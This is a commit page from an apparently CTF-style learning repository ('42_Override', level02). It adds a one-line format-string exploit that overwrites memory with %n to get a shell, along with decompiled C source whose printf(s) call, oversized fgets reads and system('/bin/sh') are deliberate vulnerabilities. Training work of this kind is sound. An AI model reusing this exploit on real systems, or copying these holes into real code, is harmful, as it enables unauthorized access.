starnakin/42_Override
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

level2: done (walkthrough tbd)

Browse Source
This commit is contained in:
0x35c 2025-05-06 13:36:28 +02:00
parent 74805a47ac
commit 51919e2e24
2 changed files with 54 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
level02/ressources/exploit Normal file
View File

@ -0,0 +1 @@
(python -c 'print("%4196997p" + "%8$n" + "\n" + "\x28\x12\x60")'; cat) | ./level02

53
level02/source.c Normal file
View File

@ -0,0 +1,53 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(void)
{
char buff[96];
int v5;
char password[48];
char s[96]; // buffer located at the 28th element on the stack
int v8;
int len;
FILE *stream;
memset(s, 0, sizeof(s));
v8 = 0;
memset(password, 0, 41);
memset(buff, 0, sizeof(buff));
v5 = 0;
stream = 0;
len = 0;
stream = fopen("/home/users/level03/.pass", "r");
if (!stream) {
fwrite("ERROR: failed to open password file\n", 1, 36, stderr);
exit(1);
}
len = fread(password, 1, 41, stream);
password[strcspn(password, "\n")] = '\0';
if (len != 41) {
fwrite("ERROR: failed to read password file\n", 1, 36, stderr);
exit(1);
}
fclose(stream);
puts("===== [ Secure Access System v1.0 ] =====");
puts("/***************************************\\");
puts("| You must login to access this system. |");
puts("\\**************************************/");
printf("--[ Username: ");
fgets(s, 100, stdin);
s[strcspn(s, "\n")] = '\0';
printf("--[ Password: ");
fgets(buff, 100, stdin);
buff[strcspn(buff, "\n")] = '\0';
puts("*****************************************");
if (strncmp(password, buff, 41)) {
printf(s);
puts(" does not have access!");
exit(1);
}
printf("Greetings, %s!\n", s);
system("/bin/sh");
return 0;
}